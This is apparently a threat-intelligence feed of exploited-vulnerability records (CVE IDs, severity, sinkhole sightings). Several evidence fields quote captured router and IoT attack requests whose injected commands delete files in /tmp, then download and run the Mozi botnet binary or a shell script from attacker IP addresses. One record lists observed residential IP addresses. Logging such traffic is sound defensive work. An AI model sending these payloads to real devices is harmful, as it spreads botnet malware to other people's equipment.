{"uuid": "7e778c2d-cf27-4c9c-9fe6-fc01102b5431", "vulnerability": {"vulnId": "CVE-2024-13030", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:49:58+00:00"}, "gcve": {"gna": 1, "object_uuid": "7e778c2d-cf27-4c9c-9fe6-fc01102b5431", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:49:58", "last_seen_at": "2026-03-12T10:49:58", "first_seen_at": "2026-03-12T10:49:58"}, "evidence": [{"source": "cti-feed.circl.lu", "type": "sinkhole", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "OST /HNAP1/ HTTP/1.0\r\nHost: 193.168.113.145:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://180.243.2.45:51387/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n<soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\">\r\n<PortMappingDescription>foobar</PortMappingDescription>\r\n<InternalClient>192.168.0.100</InternalClient>\r\n<PortMappingProtocol>TCP</PortMappingProtocol>\r\n<ExternalPort>1234</ExternalPort>\r\n<InternalPort>1234</InternalPort>\r\n</AddPortMapping></soap:Body></soap:Envelope>"}}]}
{"uuid": "aec8c947-3fea-48c3-9bec-d2cec737fac3", "vulnerability": {"vulnId": "CVE-2021-35394", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:45:44+00:00"}, "gcve": {"gna": 1, "object_uuid": "aec8c947-3fea-48c3-9bec-d2cec737fac3", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:45:44", "last_seen_at": "2026-03-12T10:45:44", "first_seen_at": "2026-03-12T10:45:44"}, "evidence": [{"source": "cti-feed.circl.lu", "type": "sinkhole", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "orf;cd /tmp; /bin/busybox wget http://181.215.60.5:8084/dick.sh; chmod +x dick.sh; ./dick.sh; "}}]}
{"uuid": "f4f43160-12d2-41a0-9dcf-d016d5bd8761", "vulnerability": {"vulnId": "CVE-2017-17215", "altId": ["[]"]}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:42:33+00:00"}, "gcve": {"gna": 1, "object_uuid": "f4f43160-12d2-41a0-9dcf-d016d5bd8761", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:42:33", "last_seen_at": "2026-03-12T10:42:33", "first_seen_at": "2026-03-12T10:42:33"}, "evidence": [{"source": "cti-feed.circl.lu", "type": "sinkhole", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 193.168.124.237:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n<s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\r\n<NewStatusURL>$(/bin/busybox wget -g 180.243.2.45:51387 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL>\r\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\r\n</u:Upgrade></s:Body></s:Envelope>"}}]}
{"uuid": "1b1e860e-2f21-4e03-8570-b3edc31111f9", "vulnerability": {"vulnId": "CVE-2014-8361", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:16:09+00:00"}, "gcve": {"gna": 1, "object_uuid": "1b1e860e-2f21-4e03-8570-b3edc31111f9", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:16:09", "last_seen_at": "2026-03-12T10:16:09", "first_seen_at": "2026-03-12T10:16:09"}, "evidence": [{"source": "cti-feed.circl.lu", "type": "sinkhole", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "POST /picsdesc.xml HTTP/1.1                                                                 \r\nContent-Length: 630                                                                         \r\nAccept-Encoding: gzip, deflate                                                              \r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping                                                                                                                \r\nAccept: /                                                                                   \r\nUser-Agent: Hello-World                                                                                                                                                                  \r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope//\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn\r\n:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort\r\n><NewInternalClient>cd /var/; wget http://180.243.2.45:51387/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPort\r\nMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"}}]}
{"uuid": "523ca818-9868-4f11-832b-baf2fbd9d76c", "vulnerability": {"vulnId": "GCVE-1-2026-0020", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-11T14:12:55+00:00"}, "gcve": {"gna": 1, "object_uuid": "523ca818-9868-4f11-832b-baf2fbd9d76c", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-11T14:12:55", "last_seen_at": "2026-03-11T14:12:55", "first_seen_at": "2026-01-14T14:12:55"}, "evidence": [{"source": "cti-feed.circl.lu", "type": "sinkhole", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n<SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;>\r\n<NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://180.243.4.71:51387/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`\r\n</NewNTPServer1><NewNTPServer2>`echo DEATH`\r\n</NewNTPServer2><NewNTPServer3>`echo DEATH`\r\n</NewNTPServer3><NewNTPServer4>`echo DEATH`\r\n</NewNTPServer4><NewNTPServer5>`echo DEATH`\r\n</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"}}]}
{"uuid": "faf06699-e4d6-4b42-a97e-6e625bf07c3a", "vulnerability": {"vulnId": "CVE-2026-25108", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-02-26T10:01:52+00:00"}, "gcve": {"gna": 1, "object_uuid": "faf06699-e4d6-4b42-a97e-6e625bf07c3a", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"remote_code_execution": true, "authentication_required": true}, "timestamps": {"asserted_at": "2026-02-26T10:01:52", "last_seen_at": "2026-02-26T10:01:52", "first_seen_at": "2026-02-26T10:01:52"}, "evidence": []}
{"uuid": "d24b6076-eba9-482f-9c75-f3d3f6d33de6", "vulnerability": {"vulnId": "CVE-2026-1340", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-02-03T16:24:28+00:00"}, "gcve": {"object_uuid": "d24b6076-eba9-482f-9c75-f3d3f6d33de6", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"first_seen_at": "2026-02-03T10:22:00"}, "evidence": []}
{"uuid": "8532db83-0134-4daa-a82f-90fd78906237", "vulnerability": {"vulnId": "CVE-2026-1281", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-02-03T16:21:36+00:00"}, "gcve": {"object_uuid": "8532db83-0134-4daa-a82f-90fd78906237", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"first_seen_at": "2026-02-03T00:09:00"}, "evidence": []}
{"uuid": "654a76ab-65b5-485b-a116-b3d71a795054", "vulnerability": {"vulnId": "CVE-2023-28771", "altId": ["GCVE-0-2023-28771"]}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-02-03T09:42:53+00:00"}, "gcve": {"object_uuid": "654a76ab-65b5-485b-a116-b3d71a795054", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"last_seen_at": "2026-01-28T17:00:00", "first_seen_at": "2025-01-01T00:00:00"}, "scope": {"notes": "#  ip           | as_num | as_name                     | as_country | ptr                                | last_timestamp   \r\n#  -------------+--------+-----------------------------+------------+------------------------------------+------------------\r\n  69.69.70.70  | 209    | CENTURYLINK-US-LEGACY-QWEST | US         | nj-69-69-70-70.dyn.embarqhsd.net   | 2026-01-28 17:45:08\r\n  70.71.69.69  | 6327   | SHAW                        | CA         | S0106889e68483a90.vs.shawcable.net | 2026-01-28 17:45:09\r\n  98.45.67.89  | 7922   | COMCAST-7922                | US         | c-98-45-67-89.hsd1.ca.comcast.net  | 2026-01-28 17:45:07\r\n  95.135.54.10 | 209630 | KREDIT-AS                   | UA         |                                    | 2026-01-28 17:24:43"}, "evidence": [{"source": "cti-feed.circl.lu", "type": "sinkhole", "signal": "in_the_wild_attempts", "confidence": 1.0}]}
{"uuid": "50fd1f23-20c3-46f1-8fd0-dfcac5812225", "vulnerability": {"vulnId": "CVE-2026-21509", "altId": []}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-02-02T15:44:22+00:00"}, "gcve": {"object_uuid": "50fd1f23-20c3-46f1-8fd0-dfcac5812225", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"remote_code_execution": true, "authentication_required": false}, "timestamps": {"first_seen_at": "2026-01-26T10:00:00"}, "evidence": []}
{"uuid": "9d0b5efa-7369-4c7b-a448-529e4a837f2e", "vulnerability": {"vulnId": "CVE-2025-53770", "altId": ["GCVE-0-2025-53770"]}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-02-02T14:32:46+00:00"}, "gcve": {"object_uuid": "9d0b5efa-7369-4c7b-a448-529e4a837f2e", "origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd"}, "characteristics": {"local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"last_seen_at": "2025-09-30T10:00:00", "first_seen_at": "2025-07-20T20:00:00"}, "evidence": []}